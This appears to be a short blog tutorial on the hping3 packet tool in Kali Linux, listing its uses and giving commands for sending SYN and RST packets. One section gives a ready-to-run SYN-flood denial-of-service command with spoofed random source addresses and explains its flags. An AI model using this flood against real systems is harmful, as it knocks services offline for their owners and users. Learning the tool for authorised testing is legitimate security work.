Hping Network Security – Kali Linux Tutorial
There are mainly two factors are involved in the success of penetration testing and ethical hacking, one is the right methodology and second is the right tool. The standard procedure of ethical hacking has already been discussed which consist of information gathering and enumeration, these are some really important steps which ultimately lead to the successful hack. Nmap is for far the best utility to perform the network information gathering and namp can also perform so many other tasks including but not limited to: the port scanning, firewall and operating system detection and even vulnerability analysis.

But, a smart hacker has a combination of utilities and you should not stuck with some number of tools. You should get command on different tools and techniques that might be helpful in vulnerability assessment. You might have heard about hping which is a command line tool and it is also called the TCP/IP analyzer, it is available on the Kali Linux so if you are working on Kali you need not to download it; users of other operating system should get it from the official website.

Tests Hping can Perform

  • Firewall testing
  • Advanced port scanning
  • Network testing, using different protocols, TOS, fragmentation
  • Manual path MTU discovery
  • Advanced traceroute, under all the supported protocols
  • Remote OS fingerprinting
  • Remote uptime guessing
  • TCP/IP stacks auditing
  • hping can also be useful to students that are learning TCP/IP
Hping works on Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows.
Goto → Applications →Kali Linux → Information Gathering → Live Host Identification → Hping3

Hping Tutorial

In this section I will discuss the commands to execute a particular tasks, the theory and reason behind a tasks will not be discussed. Some of reason like SYN packets are already discussed or if you are using them it means you already understood what you are doing.

To send SYN packets
hping3 -S target
hping3 -S

If you want to do inverse mapping then RST packets are recommended:
hping3 -R target
hping3 -R

DDOS attack using hping
sudo hping3 -i u1 -S -p <target port> <target ip> --rand-source
Here -S indicates the SYN flag, -p means the desired port number, -i u1 means the delay of 1 micro second between each packet, --rand-source means to choose random source address. --rand-dest may also be included.

Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
Hping Network Security – Kali Linux Tutorial Reviewed by Ethical Hacking on 11:39 AM Rating: 5

No comments:

Feel free to ask questions, we love to respond.

All Rights Reserved by The World of IT & Cyber Security: © 2014 - 2015
Powered By Blogger, Designed by Sweetheme

Contact Form


Email *

Message *

Powered by Blogger.